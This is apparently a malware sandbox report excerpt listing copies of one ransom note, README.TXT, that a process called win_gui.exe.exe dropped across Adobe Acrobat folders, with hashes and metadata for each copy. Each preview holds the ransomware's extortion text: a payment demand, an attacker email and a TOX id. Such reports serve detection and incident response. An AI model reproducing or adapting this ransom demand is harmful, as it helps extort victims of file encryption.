                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\collect_feedback\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
